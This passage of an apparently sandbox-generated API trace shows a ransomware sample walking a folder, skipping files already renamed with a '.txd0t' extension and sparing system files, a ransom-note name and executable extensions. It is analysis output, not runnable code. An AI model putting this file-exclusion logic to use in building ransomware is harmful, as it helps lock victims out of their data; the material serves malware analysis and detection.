(psz1="header.bmp.txd0t", psz2="..") returned 1 [0117.648] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.648] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.648] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="header.bmp.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\header.bmp.txd0t") returned="C:\\588bce7c90097ed212\\header.bmp.txd0t" [0117.648] PathFindExtensionW (pszPath="header.bmp.txd0t") returned=".txd0t" [0117.648] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.648] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x59539078, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xad13a4b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core.mzz.txd0t", cAlternateFileName="NETFX_~2.TXD")) returned 1 [0117.648] StrCmpW (psz1="netfx_Core.mzz.txd0t", psz2=".") returned 1 [0117.648] StrCmpW (psz1="netfx_Core.mzz.txd0t", psz2="..") returned 1 [0117.648] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.648] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.656] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core.mzz.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t" [0117.656] PathFindExtensionW (pszPath="netfx_Core.mzz.txd0t") returned=".txd0t" [0117.656] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.656] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x5958527b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1d0400, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x64.msi.txd0t", cAlternateFileName="NETFX_~3.TXD")) returned 1 [0117.656] StrCmpW (psz1="netfx_Core_x64.msi.txd0t", psz2=".") returned 1 [0117.656] StrCmpW (psz1="netfx_Core_x64.msi.txd0t", psz2="..") returned 1 [0117.656] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.656] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.657] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x64.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t" [0117.657] PathFindExtensionW (pszPath="netfx_Core_x64.msi.txd0t") returned=".txd0t" [0117.657] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.657] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x592b054a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11c200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x86.msi.txd0t", cAlternateFileName="NETFX_~1.TXD")) returned 1 [0117.657] StrCmpW (psz1="netfx_Core_x86.msi.txd0t", psz2=".") returned 1 [0117.657] StrCmpW (psz1="netfx_Core_x86.msi.txd0t", psz2="..") returned 1 [0117.657] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.664] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.664] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x86.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t" [0117.665] PathFindExtensionW (pszPath="netfx_Core_x86.msi.txd0t") returned=".txd0t" [0117.665] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.665] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x29224c7, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended.mzz.txd0t", cAlternateFileName="NE27FE~1.TXD")) returned 1 [0117.665] StrCmpW (psz1="netfx_Extended.mzz.txd0t", psz2=".") returned 1 [0117.665] StrCmpW (psz1="netfx_Extended.mzz.txd0t", psz2="..") returned 1 [0117.665] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.672] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.672] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended.mzz.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t" [0117.672] PathFindExtensionW (pszPath="netfx_Extended.mzz.txd0t") returned=".txd0t" [0117.672] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.672] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x595ab4e7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd5200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x64.msi.txd0t", cAlternateFileName="NETFX_~4.TXD")) returned 1 [0117.672] StrCmpW (psz1="netfx_Extended_x64.msi.txd0t", psz2=".") returned 1 [0117.673] StrCmpW (psz1="netfx_Extended_x64.msi.txd0t", psz2="..") returned 1 [0117.673] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.673] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.673] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x64.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t" [0117.673] PathFindExtensionW (pszPath="netfx_Extended_x64.msi.txd0t") returned=".txd0t" [0117.673] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.680] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x5961dbfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x79200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x86.msi.txd0t", cAlternateFileName="NE814D~1.TXD")) returned 1 [0117.680] StrCmpW (psz1="netfx_Extended_x86.msi.txd0t", psz2=".") returned 1 [0117.680] StrCmpW (psz1="netfx_Extended_x86.msi.txd0t", psz2="..") returned 1 [0117.680] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.680] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.680] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x86.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t" [0117.680] PathFindExtensionW (pszPath="netfx_Extended_x86.msi.txd0t") returned=".txd0t" [0117.681] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.681] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x595d177b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x428ae, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="ParameterInfo.xml.txd0t", cAlternateFileName="PARAME~1.TXD")) returned 1 [0117.700] StrCmpW (psz1="ParameterInfo.xml.txd0t", psz2=".") returned 1 [0117.700] StrCmpW (psz1="ParameterInfo.xml.txd0t", psz2="..") returned 1 [0117.700] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.700] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.707] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="ParameterInfo.xml.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t" [0117.707] PathFindExtensionW (pszPath="ParameterInfo.xml.txd0t") returned=".txd0t" [0117.707] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.708] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x5966a03f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9RAST_x64.msi.txd0t", cAlternateFileName="RGB9RA~2.TXD")) returned 1 [0117.715] StrCmpW (psz1="RGB9RAST_x64.msi.txd0t", psz2=".") returned 1 [0117.715] StrCmpW (psz1="RGB9RAST_x64.msi.txd0t", psz2="..") returned 1 [0117.715] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.715] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.716] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9RAST_x64.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t") returned="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t" [0117.724] PathFindExtensionW (pszPath="RGB9RAST_x64.msi.txd0t") returned=".txd0t" [0117.724] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.724] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x59643e0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9Rast_x86.msi.txd0t", cAlternateFileName="RGB9RA~1.TXD")) returned 1 [0117.735] StrCmpW (psz1="RGB9Rast_x86.msi.txd0t", psz2=".") returned 1 [0117.735] StrCmpW (psz1="RGB9Rast_x86.msi.txd0t", psz2="..") returned 1 [0117.735] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9Rast_x86.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t") returned="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t" [0117.742] PathFindExtensionW (pszPath="RGB9Rast_x86.msi.txd0t") returned=".txd0t" [0117.743] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.751] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0117.751] StrCmpW (psz1="Setup.exe", psz2=".") returned 1 [0117.751] StrCmpW (psz1="Setup.exe", psz2="..") returned 1 [0117.751] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.768] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Setup.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Setup.exe") returned="C:\\588bce7c90097ed212\\Setup.exe" [0117.768] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0117.768] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0117.768] StrCmpIW (psz1="Setup.exe", psz2="bootsect.bak") returned 1 [0117.768] StrCmpIW (psz1="Setup.exe", psz2="iconcache.db") returned 1 [0117.776] StrCmpIW (psz1="Setup.exe", psz2="thumbs.db") returned -1 [0117.776] StrCmpIW (psz1="Setup.exe", psz2=" ransomware ") returned 1 [0117.776] StrCmpIW (psz1="Setup.exe", psz2=" ransom ") returned 1 [0117.776] StrCmpIW (psz1="Setup.exe", psz2="debug.txt") returned 1 [0117.776] StrCmpIW (psz1="Setup.exe", psz2="boot.ini") returned 1 [0117.782] StrCmpIW (psz1="Setup.exe", psz2="desktop.ini") returned 1 [0117.782] StrCmpIW (psz1="Setup.exe", psz2="autorun.inf") returned 1 [0117.782] StrCmpIW (psz1="Setup.exe", psz2="ntuser.dat") returned 1 [0117.782] StrCmpIW (psz1="Setup.exe", psz2="ntldr") returned 1 [0117.782] StrCmpIW (psz1="Setup.exe", psz2="ntdetect.com") returned 1 [0117.796] StrCmpIW (psz1="Setup.exe", psz2="bootfont.bin") returned 1 [0117.796] StrCmpIW (psz1="Setup.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.796] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0117.796] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0117.804] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0117.804] StrCmpW (psz1="SetupEngine.dll", psz2=".") returned 1 [0117.804] StrCmpW (psz1="SetupEngine.dll", psz2="..") returned 1 [0117.812] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.812] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.812] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupEngine.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupEngine.dll") returned="C:\\588bce7c90097ed212\\SetupEngine.dll" [0117.812] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0117.812] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0117.812] StrCmpIW (psz1="SetupEngine.dll", psz2="bootsect.bak") returned 1 [0117.812] StrCmpIW (psz1="SetupEngine.dll", psz2="iconcache.db") returned 1 [0117.815] StrCmpIW (psz1="SetupEngine.dll", psz2="thumbs.db") returned -1 [0117.815] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransomware ") returned 1 [0117.815] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransom ") returned 1 [0117.815] StrCmpIW (psz1="SetupEngine.dll", psz2="debug.txt") returned 1 [0117.815] StrCmpIW (psz1="SetupEngine.dll", psz2="boot.ini") returned 1 [0117.818] StrCmpIW (psz1="SetupEngine.dll", psz2="desktop.ini") returned 1 [0117.818] StrCmpIW (psz1="SetupEngine.dll", psz2="autorun.inf") returned 1 [0117.818] StrCmpIW (psz1="SetupEngine.dll", psz2="ntuser.dat") returned 1 [0117.818] StrCmpIW (psz1="SetupEngine.dll", psz2="ntldr") returned 1 [0117.818] StrCmpIW (psz1="SetupEngine.dll", psz2="ntdetect.com") returned 1 [0117.820] StrCmpIW (psz1="SetupEngine.dll", psz2="bootfont.bin") returned 1 [0117.820] StrCmpIW (psz1="SetupEngine.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.820] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0117.820] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.820] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0117.820] StrCmpW (psz1="SetupUi.dll", psz2=".") returned 1 [0117.821] StrCmpW (psz1="SetupUi.dll", psz2="..") returned 1 [0117.821] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.dll") returned="C:\\588bce7c90097ed212\\SetupUi.dll" [0117.830] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0117.830] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0117.832] StrCmpIW (psz1="SetupUi.dll", psz2="bootsect.bak") returned 1 [0117.832] StrCmpIW (psz1="SetupUi.dll", psz2="iconcache.db") returned 1 [0117.832] StrCmpIW (psz1="SetupUi.dll", psz2="thumbs.db") returned -1 [0117.849] StrCmpIW (psz1="SetupUi.dll", psz2=" ransomware ") returned 1 [0117.849] StrCmpIW (psz1="SetupUi.dll", psz2=" ransom ") returned 1 [0117.849] StrCmpIW (psz1="SetupUi.dll", psz2="debug.txt") returned 1 [0117.850] StrCmpIW (psz1="SetupUi.dll", psz2="boot.ini") returned 1 [0117.850] StrCmpIW (psz1="SetupUi.dll", psz2="desktop.ini") returned 1 [0117.850] StrCmpIW (psz1="SetupUi.dll", psz2="autorun.inf") returned 1 [0117.850] StrCmpIW (psz1="SetupUi.dll", psz2="ntuser.dat") returned 1 [0117.918] StrCmpIW (psz1="SetupUi.dll", psz2="ntldr") returned 1 [0117.918] StrCmpIW (psz1="SetupUi.dll", psz2="ntdetect.com") returned 1 [0117.918] StrCmpIW (psz1="SetupUi.dll", psz2="bootfont.bin") returned 1 [0117.918] StrCmpIW (psz1="SetupUi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.918] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0117.918] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.918] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5966a03f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x77a8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.xsd.txd0t", cAlternateFileName="SETUPU~1.TXD")) returned 1 [0117.919] StrCmpW (psz1="SetupUi.xsd.txd0t", psz2=".") returned 1 [0117.919] StrCmpW (psz1="SetupUi.xsd.txd0t", psz2="..") returned 1 [0117.919] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.919] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.919] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.xsd.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t") returned="C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t" [0117.919] PathFindExtensionW (pszPath="SetupUi.xsd.txd0t") returned=".txd0t" [0117.919] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.926] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0117.927] StrCmpW (psz1="SetupUtility.exe", psz2=".") returned 1 [0117.927] StrCmpW (psz1="SetupUtility.exe", psz2="..") returned 1 [0117.927] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.927] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.927] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUtility.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUtility.exe") returned="C:\\588bce7c90097ed212\\SetupUtility.exe" [0117.927] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0117.927] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="bootsect.bak") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="iconcache.db") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="thumbs.db") returned -1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", 